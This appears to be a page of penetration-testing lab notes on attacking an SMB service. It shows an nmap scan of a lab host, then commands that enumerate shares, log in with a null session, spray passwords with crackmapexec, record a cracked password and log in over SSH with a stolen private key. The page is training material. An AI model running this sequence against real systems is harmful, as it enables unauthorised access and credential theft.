Attacking SMB

May 21, 2024

# Nmap 7.94 scan initiated Wed May 22 13:28:36 2024 as: nmap -sC -sV -oN nmap-smb -p 445 -vv 10.129.251.246
Nmap scan report for 10.129.251.246
Host is up, received conn-refused (0.32s latency).
Scanned at 2024-05-22 13:28:36 PST for 14s

PORT    STATE SERVICE     REASON  VERSION
445/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ATTCSVC-LINUX<00>    Flags: <unique><active>
|   ATTCSVC-LINUX<03>    Flags: <unique><active>
|   ATTCSVC-LINUX<20>    Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 10995/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 62584/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52666/udp): CLEAN (Failed to receive data)
|   Check 4 (port 24096/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-05-22T05:28:54
|_  start_date: N/A
|_clock-skew: 7s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 22 13:28:50 2024 -- 1 IP address (1 host up) scanned in 14.06 seconds
smbclient -L 10.129.251.246
smbclient \\\\10.129.251.246\\GGJ
smbmap -H 10.129.251.246 -r GGJ
rpcclient -U'%' 10.129.251.246
poetry run crackmapexec smb 10.129.251.246 -u users.list -p pws.list --local-auth
jason:34c8zuNBo91!@28Bszh
smbclient -U jason \\\\10.129.251.246\\GGJ
chmod 600 id_rsa
ssh -i id_rsa john@IP
PreviousLatest FTP VulnerabilitiesNextLatest SMB Vulnerabilities

Last updated